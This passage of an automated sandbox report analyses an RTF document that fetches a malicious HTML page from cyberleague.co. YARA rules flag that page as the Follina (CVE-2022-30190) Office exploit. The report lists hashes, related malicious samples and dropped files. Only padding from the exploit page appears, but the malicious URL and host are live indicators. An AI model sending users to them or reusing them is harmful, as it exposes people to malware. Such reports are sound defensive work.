        NameIPActiveMaliciousAntivirus DetectionReputation
        cyberleague.co
        13.250.15.191
        truetrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          https://cyberleague.co/th1s.htmltrue
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://cyberleague.co/th1s.htmlyX~WRF{529AA3F3-C7EA-493B-9EDD-4242ACBC44EE}.tmp.0.drfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          13.250.15.191
          cyberleague.coUnited States
          16509AMAZON-02UStrue
          Joe Sandbox Version:35.0.0 Citrine
          Analysis ID:639039
          Start date and time: 03/06/202222:56:312022-06-03 22:56:31 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 4m 52s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:20220531_180800.rtf
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
          Number of analysed new started processes analysed:8
          Number of new started drivers analysed:1
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal68.expl.evad.winRTF@1/20@15/1
          EGA Information:Failed
          HDC Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .rtf
          • Adjust boot time
          • Enable AMSI
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Scroll down
          • Close Viewer
          • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
          • Report size getting too big, too many NtCreateFile calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          No simulations
          No context
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          AMAZON-02UShttps://s3.amazonaws.com/nepasrepondre-notifications.canadapost-postescanada.ca32/AHdasgda4.htmlGet hashmaliciousBrowse
          • 52.217.64.70
          https://indd.adobe.com/view/cb389d38-bc80-431d-8345-7de75cf5f11cGet hashmaliciousBrowse
          • 13.224.103.25
          https://online.pubhtml5.com/iuki/lvxf/Get hashmaliciousBrowse
          • 108.138.199.39
          https://app.pandadoc.com/document/147bd6920f1a81f0ef9bacb8624f0088ce2f4553?Get hashmaliciousBrowse
          • 13.224.98.206
          https://clt1439401.bmetrack.com/c/l?u=DC69C61&e=14461D7&c=15F6A9&t=1&l=7D4D8F67&email=89jMSQHVSHBwfz8oN8sDeXzBjzlZ2TJR&seq=1#YXNoYXJtYUBjb25kZW5hc3QuY29tGet hashmaliciousBrowse
          • 44.240.32.226
          vJfzYCjtYVGet hashmaliciousBrowse
          • 34.220.228.175
          doWIi2qXdiGet hashmaliciousBrowse
          • 13.238.96.34
          IyPYpW882XGet hashmaliciousBrowse
          • 13.122.60.213
          52eFMJemTwGet hashmaliciousBrowse
          • 18.177.181.9
          8zla0LeXmfGet hashmaliciousBrowse
          • 13.230.157.212
          11LbTZ3r9hGet hashmaliciousBrowse
          • 13.33.250.171
          https://download.clipgrab.org/clipgrab-3.9.7-dotinstaller.exeGet hashmaliciousBrowse
          • 13.224.98.224
          https://download.clipgrab.org/clipgrab-3.9.7-dotinstaller.exeGet hashmaliciousBrowse
          • 13.224.98.224
          https://linktr.ee/paul.kennedyGet hashmaliciousBrowse
          • 13.224.103.107
          https://www.evernote.com/shard/s745/sh/a8d8ce86-17ac-3321-0033-db5bac47f516/20e24f82ca6a653fbe24ec592a54a552Get hashmaliciousBrowse
          • 52.41.81.16
          EAET.apkGet hashmaliciousBrowse
          • 76.223.55.44
          deathtrump.x86Get hashmaliciousBrowse
          • 44.250.190.218
          tjW5CP15hqGet hashmaliciousBrowse
          • 13.124.134.191
          deathtrump.arm7Get hashmaliciousBrowse
          • 99.81.21.100
          ysAHnJDl5OGet hashmaliciousBrowse
          • 13.224.103.101
          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          05af1f5ca1b87cc9cc9b25185115607dPO #81026.xlsxGet hashmaliciousBrowse
          • 13.250.15.191
          nurse_practitioner_collaborative_practice_agreement_wisconsin 20496.jsGet hashmaliciousBrowse
          • 13.250.15.191
          bad.pdf.exeGet hashmaliciousBrowse
          • 13.250.15.191
          ExportXDocuments-20220531.xlsGet hashmaliciousBrowse
          • 13.250.15.191
          sample.zipGet hashmaliciousBrowse
          • 13.250.15.191
          05-2022-0438.docGet hashmaliciousBrowse
          • 13.250.15.191
          New purchase order CYO-751.xlsbGet hashmaliciousBrowse
          • 13.250.15.191
          RFQ Integrated INC.docxGet hashmaliciousBrowse
          • 13.250.15.191
          Payment Reference.docxGet hashmaliciousBrowse
          • 13.250.15.191
          Purchase Order (Ref M050417).docxGet hashmaliciousBrowse
          • 13.250.15.191
          GBE_PO_3000105160.docxGet hashmaliciousBrowse
          • 13.250.15.191
          Payment-Remittance advice invoice JF-EXP-2022-028.docxGet hashmaliciousBrowse
          • 13.250.15.191
          PaymentRequest_Invoice229182.docxGet hashmaliciousBrowse
          • 13.250.15.191
          NEW ORDER.docxGet hashmaliciousBrowse
          • 13.250.15.191
          Invoice.docxGet hashmaliciousBrowse
          • 13.250.15.191
          Purchase Order Ref M050417.ppamGet hashmaliciousBrowse
          • 13.250.15.191
          Purchase Order Ref M050417.ppamGet hashmaliciousBrowse
          • 13.250.15.191
          Remittance-Details-951244-1.xlamGet hashmaliciousBrowse
          • 13.250.15.191
          SOA.xlsxGet hashmaliciousBrowse
          • 13.250.15.191
          aT7OJ9KSyz.rtfGet hashmaliciousBrowse
          • 13.250.15.191
          7dcce5b76c8b17472d024758970a406bContract-2022-06-03_1618.xlsGet hashmaliciousBrowse
          • 13.250.15.191
          91950Z_75589.xlsGet hashmaliciousBrowse
          • 13.250.15.191
          doc8749832900.xlsxGet hashmaliciousBrowse
          • 13.250.15.191
          New Order.xlsxGet hashmaliciousBrowse
          • 13.250.15.191
          X_2704223471.xlsbGet hashmaliciousBrowse
          • 13.250.15.191
          VIP Invitation to Doha Expo 2023.docxGet hashmaliciousBrowse
          • 13.250.15.191
          INV_R004671.xlsxGet hashmaliciousBrowse
          • 13.250.15.191
          https://charlenebreton.clickfunnels.com/optinaziws30gGet hashmaliciousBrowse
          • 13.250.15.191
          LxyPj87jKk.xlsGet hashmaliciousBrowse
          • 13.250.15.191
          SecuriteInfo.com.X97M.DownLoader.535.15867.xlsGet hashmaliciousBrowse
          • 13.250.15.191
          SecuriteInfo.com.X97M.DownLoader.535.950.xlsGet hashmaliciousBrowse
          • 13.250.15.191
          SecuriteInfo.com.XF.AShadow.4859.32307.xlsGet hashmaliciousBrowse
          • 13.250.15.191
          SecuriteInfo.com.W97M.DownLoader.5260.16289.xlsGet hashmaliciousBrowse
          • 13.250.15.191
          SecuriteInfo.com.X97M.DownLoader.535.20853.xlsGet hashmaliciousBrowse
          • 13.250.15.191
          SecuriteInfo.com.X97M.DownLoader.535.18563.xlsGet hashmaliciousBrowse
          • 13.250.15.191
          SecuriteInfo.com.XF.AShadow.4859.9648.xlsGet hashmaliciousBrowse
          • 13.250.15.191
          C5uPdb1uj7.xlsmGet hashmaliciousBrowse
          • 13.250.15.191
          Mag_2022_FAT_8.xlsmGet hashmaliciousBrowse
          • 13.250.15.191
          sample.zipGet hashmaliciousBrowse
          • 13.250.15.191
          C5uPdb1uj7.xlsmGet hashmaliciousBrowse
          • 13.250.15.191
          No context
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):131072
          Entropy (8bit):0.28805818698686764
          Encrypted:false
          SSDEEP:96:K80LHs15sXMfsKQYKg5EgkZ9SlxDZ9Slx1H:10ZQ5EgkgFgv
          MD5:0F53A328D727C7A8393CF8DB618D4D62
          SHA1:40630D0F9A6F68A29581FDA5E76576BF7AE71B7A
          SHA-256:A38F36CF8DA290265A3EBD5FFE647E624FC904C2B31B5D95A76A7DE879476C89
          SHA-512:31456776CEC78F653EEE9B95DC80322F4BD1183EE380F7766751ED271534AF4ECD987EBF91E5A61B17332D879AF642F01F0032E186B6FD02BA9656B38B2E43DE
          Malicious:false
          Reputation:low
          Preview:......M.eFy...zX1.U...E.......S,...X.F...Fa.q............................/..R..G@..'..jS~........%.k....I...-...Z.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):131072
          Entropy (8bit):0.6745994346547596
          Encrypted:false
          SSDEEP:96:KXpYCylKgE5XB6V+PAeAKoGR+EPRAriArrGRrDij8A7EAOiMrApMrA:94gEv9pIGNPR4i4UrDij8sEviMrmMr
          MD5:CE42E4E68F81AFD5140DEB010D3974D9
          SHA1:B28D3F230028716DE5868FCEB78FFD804CB64F20
          SHA-256:66046EDB9D30EE2110E19A0F6B13EB85BD3AD7C0E2F7A39DF5A243899C01B015
          SHA-512:562D29C5C5EADDDB09DA1CE689A793AE9177034D986291711AF6C51039EAE3C92B30626FE20645889C51D4FE8EFB73AF98163C0759BA5547E4AE31078252EBC7
          Malicious:false
          Reputation:low
          Preview:......M.eFy...z....H..N.].y....S,...X.F...Fa.q............................V......J.tZ.Y*.$........8...:..H.&I..F.d.S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):114
          Entropy (8bit):3.9333319485137532
          Encrypted:false
          SSDEEP:3:yVlgsRlz5nOlVilXKPIldOYRO+fzpWSR5l276:yPblz5nOlVilaIXOYRO+fzpWSt22
          MD5:DBA609DFDA4A5C85C8EE0FC4064E7EF1
          SHA1:5A08AFFB1250AEB5F1CABF76D4ACB41163B6EB21
          SHA-256:F63018A026B41D192965C2AF5B317D276F7A1752656DDC92553208C086C74918
          SHA-512:FB4531A2D4B2017E3F1C11584782A8F981C8C4858AAAFC8612275B5B707EFB6103CA48D63B73F13FCA5396BC4F419E69B4CC42E7478C5FBBF86C6B213D55FABD
          Malicious:false
          Reputation:low
          Preview:..H..@....b..q....]F.S.D.-.{.D.0.7.E.1.3.1.7.-.E.2.1.0.-.4.5.1.E.-.9.0.6.F.-.B.4.7.A.5.E.9.E.2.F.7.2.}...F.S.D..
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):131072
          Entropy (8bit):0.28681787155888283
          Encrypted:false
          SSDEEP:96:KoLGWkpIdVgNhBNHiN34xoByqVTh/JydVN0Quw+nYwVQXj7zVQuw+nYwVQXj7z6H:juAWZi/kqm8d78dv
          MD5:ABA9368EAF1B4D977D05230FA0AA98A3
          SHA1:30B33313B742BF2D6FF18C5F94A968BEA72AC1DF
          SHA-256:19E5D7038C725D60565FD1555F8327660BC49A35D2FBC98DDE8590919C9BCEB8
          SHA-512:F4C1954A2F70D90DAC1726915FC4D3AF07D6F8FF349ED7B6FF507DDDA1BEB26BFC47A473482D78CDBB0B9CD605E383EF7C918F1D094D2029420619247201D0B3
          Malicious:false
          Reputation:low
          Preview:......M.eFy...z......F....Qk..S,...X.F...Fa.q.............................L5G...L..tf).............F...H.4.....m.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):131072
          Entropy (8bit):0.22146428280828123
          Encrypted:false
          SSDEEP:24:I3ev8LwnM0B34FlvHIJKqubKuXCZx6GSeWPOOVRb5XJr8IZxfpA5j36QIHu/w2fG:I3rUrB+vHyZMNdtfxxAUBiRiZ
          MD5:234B22C34D8E43311793320B0BA6E463
          SHA1:217801EE5CA96B065D4F1282983487272AB7D89A
          SHA-256:E59D9F9EBEDDF1697EC9B434F7D23C9EF4ACC4DB61E0B4942C28D2DADC0FDD87
          SHA-512:826B4DFF773E1F94E66847407EE1877E164C3C5C260CE5664B048B23F4C0190F91E5DEFBF7382138EDE9659434361790AC74B1C8D82A6556CC65B4674F07DFB4
          Malicious:false
          Reputation:low
          Preview:......M.eFy...z.8..U..F.......S,...X.F...Fa.q............................%....A9D..$.?...........z...FqF..^..\\.P>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):114
          Entropy (8bit):3.9560520403188666
          Encrypted:false
          SSDEEP:3:yVlgsRlz1ylJ19X1vWSw/+9snKhmf276:yPblz125XdWSy+anKk22
          MD5:921A52A43CA18F34DA0D4E2EC1EB1864
          SHA1:386EAAD70D06862C0124558FB2D109A0048307D6
          SHA-256:4FEBAE4D1D78D716F73088AA1BE00524C09E132F293AE4F371C47CC29E38C51D
          SHA-512:1E7826AC83669F7411DA3E232695C8D85EEF466E8404893B5741C0A5E8D0D9C4CC26912E81F74A4DB9FAB01E2588A2BBB6D6414638D8DBE05543D81FF78FCC8C
          Malicious:false
          Reputation:low
          Preview:..H..@....b..q....]F.S.D.-.{.2.B.A.6.A.7.2.5.-.A.C.2.6.-.4.B.E.3.-.9.6.A.9.-.7.A.B.2.1.8.E.E.9.A.3.D.}...F.S.D..
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
          Category:downloaded
          Size (bytes):5092
          Entropy (8bit):1.5689266993578892
          Encrypted:false
          SSDEEP:12:hPlf7fguuuuuuuuuuuuuuuuuuuuuuuuuuuuuuyxH8d2GZfgGwf80K2GUJU6+LtSm:hP12dlRg7nfG/bLtF0ooS34BM3
          MD5:DA03F3022C8E3A07A6F196216B29135E
          SHA1:1F12DE0F50FF34CDB1C1BD99BCA553F7192FA416
          SHA-256:87E5A464DE2F85A500F1B8D1028F5742F0903D9C0C3387DC572AAC8CF9027BCC
          SHA-512:9E039948E2706E864656E1EE2D1CC659F60DC24A5964D220DA4409CCDC7815197F6E3636EC5CA43915BE70DA0A88888BE55B3EAA1F1AC828265D771145EF495E
          Malicious:true
          Yara Hits:
          • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\th1s[1].htm, Author: Tobias Michalski, Christian Burkard
          • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\th1s[1].htm, Author: Joe Security
          Reputation:low
          IE Cache URL:https://cyberleague.co/th1s.html
          Preview:<!DOCTYPE html>..<html>..<body>.. <script>.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
          Category:dropped
          Size (bytes):5092
          Entropy (8bit):1.5689266993578892
          Encrypted:false
          SSDEEP:12:hPlf7fguuuuuuuuuuuuuuuuuuuuuuuuuuuuuuyxH8d2GZfgGwf80K2GUJU6+LtSm:hP12dlRg7nfG/bLtF0ooS34BM3
          MD5:DA03F3022C8E3A07A6F196216B29135E
          SHA1:1F12DE0F50FF34CDB1C1BD99BCA553F7192FA416
          SHA-256:87E5A464DE2F85A500F1B8D1028F5742F0903D9C0C3387DC572AAC8CF9027BCC
          SHA-512:9E039948E2706E864656E1EE2D1CC659F60DC24A5964D220DA4409CCDC7815197F6E3636EC5CA43915BE70DA0A88888BE55B3EAA1F1AC828265D771145EF495E
          Malicious:true
          Yara Hits:
          • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B293583.htm, Author: Tobias Michalski, Christian Burkard
          • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B293583.htm, Author: Joe Security
          Reputation:low
          Preview:<!DOCTYPE html>..<html>..<body>.. <script>.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
          Category:dropped
          Size (bytes):4980
          Entropy (8bit):3.8087894377622136
          Encrypted:false
          SSDEEP:48:cqZDMN7gsdBgLfVTped//HksYHGui3DAjG6kpJoApdHk/O:cqi7lBSTped//qH3i3DAqXLE/O
          MD5:5B29927367C1C2BEBE25499E5602DE05
          SHA1:10EB42142920A3299851F183D624731B910C6FCE
          SHA-256:820E5CFE32DD64E31AEE40837BC3730B1B0F810787A7D3AAFC700191E6551C68
          SHA-512:CD1E48056BDCBDD8CE2C0B7C8E15CA645D26FF372CA68D20D6B3078580943D4D5FA68FEE84A0C1AAC86F275ACE0059A3F76C2AF402EEC918C6680549BAB2C2EC
          Malicious:false
          Reputation:low
          Preview:....l.............../................... EMF....t.......................p....... ...O................5..............................4...5...R...p...................................S.e.g.o.e. .U.I.................................................................................................................................................................................................................................................................................................................dv......%...................................r...............)............... ... ..................?...........?................l...4........... ... ...(... ... ..... .............................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
          Category:dropped
          Size (bytes):5092
          Entropy (8bit):1.5689266993578892
          Encrypted:false
          SSDEEP:12:hPlf7fguuuuuuuuuuuuuuuuuuuuuuuuuuuuuuyxH8d2GZfgGwf80K2GUJU6+LtSm:hP12dlRg7nfG/bLtF0ooS34BM3
          MD5:DA03F3022C8E3A07A6F196216B29135E
          SHA1:1F12DE0F50FF34CDB1C1BD99BCA553F7192FA416
          SHA-256:87E5A464DE2F85A500F1B8D1028F5742F0903D9C0C3387DC572AAC8CF9027BCC
          SHA-512:9E039948E2706E864656E1EE2D1CC659F60DC24A5964D220DA4409CCDC7815197F6E3636EC5CA43915BE70DA0A88888BE55B3EAA1F1AC828265D771145EF495E
          Malicious:true
          Yara Hits:
          • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0472FED.htm, Author: Tobias Michalski, Christian Burkard
          • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0472FED.htm, Author: Joe Security
          Reputation:low
          Preview:<!DOCTYPE html>..<html>..<body>.. <script>.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.. //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=0], progressive, precision 8, 750x500, frames 3
          Category:dropped
          Size (bytes):91933
          Entropy (8bit):7.9892937833237845
          Encrypted:false
          SSDEEP:1536:7JCBhGCgBEFzvY1kH0R1ngxcrXo3N0rKL1nvFhbbrC3PJ4+6JaZB5:UBkCgBEZPml3rY3NBpvFRbAhOJi5
          MD5:A53C5995856D35B0097F80E38D258D33
          SHA1:31099B09DCCAC8C4A1BAA7E1F1B14E6C80FC516F
          SHA-256:E87E50F77EEC96A1F0E37FCA345001474B3A023EAABC8DBE6FB1989DCFCDA543
          SHA-512:92C0748B624D9C2C8941C7720EF34C7EF7793589C19517FA4AAAF40C5BE3DCDE3F7C601D1D2B142AED5EFA92E50E5B449B2A61AAB96D22FBBF2B2C9F0EEFA1F6
          Malicious:false
          Reputation:low
          Preview:......Exif..MM.*.............C....................................................................C............................................................................".................................................................................*....4.`B.,}...3..x....:..wx.2...G.8...Z...;a..Tv..a..du"..`...Z...Y..1....s.i.c<.7....Dj...V..}y.r.:.....1z.D...sg.;.c..S`1..\9.u%...X..nDC.L.Z..-..D=..29......1:....DN..l+..P.m.U.LY=.c...-....O....._w.Mj.v.A.;..v::.`l..C.......l.)....}q..D .h.h.9.U.[...(l.Da....^...c3~Y..c.#.7HC3{....PK.n.<"..L..S.^=..D..vL....<:.(....;..J..9...V...r.I........(/H...x..j]e...;.g.........t!.H.\b[.........{...bR...x..Q.Q..}..eW.GD..........]M...Xk"#.G...x..t...mZ.-M...v)SJ.w.c...1.Jl.&2y..om.$..%..i:u1...1.{{....FIN...N8...=.)...8.7a!.lJ...h.U....6j.D~.....8._Hr.bY>M.a..z............m.+..wc."A.>..q.....?=..m.....n.CR\R.Vc.=..s...H.. ......+F..F.j.j..I.....9I.<.:{.#;...mc.gF5Ga.2gB..g..&..'...`..6..s...!..u
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:Composite Document File V2 Document, Cannot read section info
          Category:dropped
          Size (bytes):4096
          Entropy (8bit):1.8698058088064178
          Encrypted:false
          SSDEEP:12:rl3bn+qFYsRY3ao92p0hCFySD5lzHSB2TTCt0aNB2TFn7iVjOFyS4CIFyS4FyS4U:rYdIp08B02UL2pigEiWBF4
          MD5:250374534DAFD474CE245E6A5281B3A9
          SHA1:8D3C4BD81822054D6811F54B16EE750903032071
          SHA-256:C142D359182AFDC3B726ADFD4E25161734D3D201027DD7B16C9632C05511D9F1
          SHA-512:E63C7F88A48269F2573FB300D1E2EDB88B2DEB97CE0A908C49579EDDD50F72BA3906DC1BB492BFF93B0B0C72CDE4D7A30BD60CCE1F4AB28CD920798D7E212AFA
          Malicious:false
          Reputation:low
          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):1024
          Entropy (8bit):0.05390218305374581
          Encrypted:false
          SSDEEP:3:ol3lYdn:4Wn
          MD5:5D4D94EE7E06BBB0AF9584119797B23A
          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
          Malicious:false
          Reputation:high, very likely benign file
          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):1536
          Entropy (8bit):1.3186956359584476
          Encrypted:false
          SSDEEP:6:W4ofylIcElClbYS7plQalvbK/SterHr4PxZUttrasD3Salx3d4XsDialL1:9oal7MClc2HK/rLGZmra4zlb4XelJ
          MD5:969565D4524D45ACD7910BFECB14B97D
          SHA1:272B72B769BB8DB11CF5E3B9D13AE3512B71B890
          SHA-256:2380C8F197156562ED8C5024E8E7F361862FC307D5CF6B6F5EC417B8DA0093B4
          SHA-512:58C7DC7E487BE8135461A125061D10289F0D81E804EDC8B57CDC9CDD5157FEE9FF14EE104CE7450BFE3708EF0DC930EF30906F4B8570092AEE4A5F79FFEB76BD
          Malicious:false
